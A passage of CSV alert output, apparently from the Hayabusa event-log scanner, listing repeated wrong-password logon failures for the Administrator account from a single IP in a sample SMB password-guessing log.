NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.612 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
